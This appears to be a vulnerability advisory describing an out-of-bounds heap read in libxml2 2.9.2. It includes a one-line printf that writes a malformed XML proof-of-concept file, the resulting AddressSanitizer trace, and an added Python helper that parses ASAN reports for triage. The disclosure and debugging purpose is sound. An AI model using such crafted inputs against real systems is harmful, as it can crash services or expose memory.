libxml2 Out of bounds memory access

2015.10.23
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

Hey, There appears to be an out-of-bounds read in libxml2 (2.9.2). This normally won't cause a crash, but is visible under ASAN or Valgrind. One way to repro would be:

$ printf '<!DOCTYPEd[<!ENTITYnSt""><!ENTITY %%nNt"<!ELEMENT<![INCLUDE0"<!ENTITYL%%N;' >test.xml
$ ./xmllint_asan test.xml

Copy of the test case: http://lcamtuf.coredump.cx/afl/demo/libxml2_oob.xml

==17901==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ea56 at pc 0x46cfc5 bp 0x7fffffffc420 sp 0x7fffffffc400
READ of size 1 at 0x60300000ea56 thread T0
    #0 0x46cfc4 in xmlParseConditionalSections (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46cfc4)
    #1 0x46d7b3 in xmlParseMarkupDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46d7b3)
    #2 0x4772a3 in xmlParseInternalSubset (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4772a3)
    #3 0x48e9b1 in xmlParseDocument (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x48e9b1)
    #4 0x4abe06 in xmlDoRead (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4abe06)
    #5 0x4ac022 in xmlReadFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4ac022)
    #6 0x40aa34 in parseAndPrintFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x40aa34)
    #7 0x411f43 in main (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x411f43)
    #8 0x7ffff61fcaf4 in __libc_start_main (/lib64/libc.so.6+0x21af4)
    #9 0x402f08 (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x402f08)

0x60300000ea56 is located 1 bytes to the right of 21-byte region [0x60300000ea40,0x60300000ea55)
allocated by thread T0 here:
    #0 0x7ffff6f4a6a8 in __interceptor_malloc (/usr/local/lib64/libasan.so.1+0x6d6a8)
    #1 0x5f6d98 in xmlStrndup (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x5f6d98)
    #2 0x412e50 in xmlCreateEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x412e50)
    #3 0x41320a in xmlAddEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x41320a)
    #4 0x41373a in xmlAddDocEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x41373a)
    #5 0x725290 in xmlSAX2EntityDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x725290)
    #6 0x45ae8f in xmlParseEntityDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x45ae8f)
    #7 0x46d437 in xmlParseMarkupDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46d437)
    #8 0x4772a3 in xmlParseInternalSubset (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4772a3)
    #9 0x48e9b1 in xmlParseDocument (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x48e9b1)
    #10 0x4abe06 in xmlDoRead (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4abe06)
    #11 0x4ac022 in xmlReadFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4ac022)
    #12 0x40aa34 in parseAndPrintFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x40aa34)
    #13 0x411f43 in main (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x411f43)
    #14 0x7ffff61fcaf4 in __libc_start_main (/lib64/libc.so.6+0x21af4)
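As an added triage helper (not part of the advisory, the reporter's tooling or libxml2), the following Python snippet parses an AddressSanitizer heap-buffer-overflow report such as the one above and extracts what a responder needs at a glance: the access kind and size, the faulting frame, the allocating frame, and how far past the heap region the access landed. The embedded report text is a constructed excerpt of the report quoted above.

```python
import re

# Constructed excerpt of the ASAN report from the advisory above.
ASAN_REPORT = """\
==17901==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ea56 at pc 0x46cfc5 bp 0x7fffffffc420 sp 0x7fffffffc400
READ of size 1 at 0x60300000ea56 thread T0
    #0 0x46cfc4 in xmlParseConditionalSections (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46cfc4)
    #1 0x46d7b3 in xmlParseMarkupDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46d7b3)
0x60300000ea56 is located 1 bytes to the right of 21-byte region [0x60300000ea40,0x60300000ea55)
allocated by thread T0 here:
    #0 0x7ffff6f4a6a8 in __interceptor_malloc (/usr/local/lib64/libasan.so.1+0x6d6a8)
    #1 0x5f6d98 in xmlStrndup (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x5f6d98)
    #2 0x412e50 in xmlCreateEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x412e50)
"""

FRAME_RE = re.compile(r"#(\d+) 0x[0-9a-f]+ in (\S+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-f]+)", re.M)
REGION_RE = re.compile(r"(\d+)-byte region \[(0x[0-9a-f]+),(0x[0-9a-f]+)\)")


def triage_asan(report):
    """Summarise an ASAN heap-buffer-overflow report.

    Returns a dict with the access kind/size, the frame that faulted, the
    size of the overflowed region, the offset of the access past the
    region end (exclusive end as ASAN prints it), and the first allocating
    frame that is not the sanitizer's malloc interceptor. Returns None for
    reports that are not heap-buffer-overflows.
    """
    if "heap-buffer-overflow" not in report:
        return None
    kind, size, addr = ACCESS_RE.search(report).groups()
    region_size, lo, hi = REGION_RE.search(report).groups()
    addr, lo, hi = int(addr, 16), int(lo, 16), int(hi, 16)
    # The report has two stacks: the faulting access, then the allocation.
    access_part, _, alloc_part = report.partition("allocated by")
    access_frames = [f for _, f in FRAME_RE.findall(access_part)]
    alloc_frames = [f for _, f in FRAME_RE.findall(alloc_part)]
    allocator = next(f for f in alloc_frames if not f.startswith("__interceptor_"))
    return {
        "access": kind,
        "size": int(size),
        "fault_in": access_frames[0],
        "region_size": int(region_size),
        "offset_past_end": addr - hi,
        "allocated_in": allocator,
    }


if __name__ == "__main__":
    print(triage_asan(ASAN_REPORT))
```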

References:

https://bugzilla.gnome.org/show_bug.cgi?id=744980


Copyright 2024, cxsecurity.com